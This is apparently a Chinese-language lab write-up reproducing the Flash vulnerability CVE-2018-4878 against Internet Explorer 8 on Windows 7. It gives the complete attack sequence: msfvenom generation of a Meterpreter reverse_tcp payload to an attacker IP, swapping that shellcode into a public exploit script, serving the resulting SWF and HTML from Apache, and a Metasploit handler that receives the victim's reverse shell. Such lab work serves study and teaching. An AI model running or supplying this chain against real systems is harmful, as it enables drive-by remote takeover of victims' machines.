Flash 0day漏洞复现 CVE-2018-4878

一.环境搭建

攻击机:kali     ip:192.168.43.79

靶机:windows7旗舰版     IE8      adobe flash player 28.0.0.137


1.adobe flash player 28.0.0.137 安装

百度adobe flash player for ie 28 进行下载,双击运行安装


查看版本方法:百度视频,随便点击一个视频,右键

Flash 0day漏洞复现 CVE-2018-4878

2.下载exp,链接:https://github.com/anbai-inc/CVE-2018-4878

二.开始复现漏洞

1.利用把exp放到kali的桌面

Flash 0day漏洞复现 CVE-2018-4878

2.msf生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.79 LPORT=6666 -f py

Flash 0day漏洞复现 CVE-2018-4878

3.复制生成的shellcode,把exp里面的shellcode换成自己生成的

Flash 0day漏洞复现 CVE-2018-4878

4.这里需要修改下大佬的脚本把Ture改成False

Flash 0day漏洞复现 CVE-2018-4878

5.设置生成的路径

Flash 0day漏洞复现 CVE-2018-4878

6.运行exp,python cve-2018-4878.py,会在桌面生成2个文件

Flash 0day漏洞复现 CVE-2018-4878

7.开启apache服务

service apache2 start

8.查看是否开启成功

service apache2 status

Flash 0day漏洞复现 CVE-2018-4878

9.把生成的2个文件移动到网站目录

cp index2.html /var/www/html/index2.html

cp exploit.swf /var/www/html/exploit.swf 

cd /var/www/html/

ls

Flash 0day漏洞复现 CVE-2018-4878

10.打开msf进行监听

msfconsole

use exploit/multi/handler

set LHOST 192.168.43.79

set LPORT 6666

set payload windows/meterpreter/reverse_tcp

Flash 0day漏洞复现 CVE-2018-4878

查看设置是否有错,show options

Flash 0day漏洞复现 CVE-2018-4878

exploit运行

Flash 0day漏洞复现 CVE-2018-4878

11.打开靶机,利用IE访问kali的网站,http://192.168.43.79/index2.html

Flash 0day漏洞复现 CVE-2018-4878

12.返回kali就可以看到成功的返回了一个会话sessions

Flash 0day漏洞复现 CVE-2018-4878

13.当靶机关掉IE后反弹的session也会跟着断掉



感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!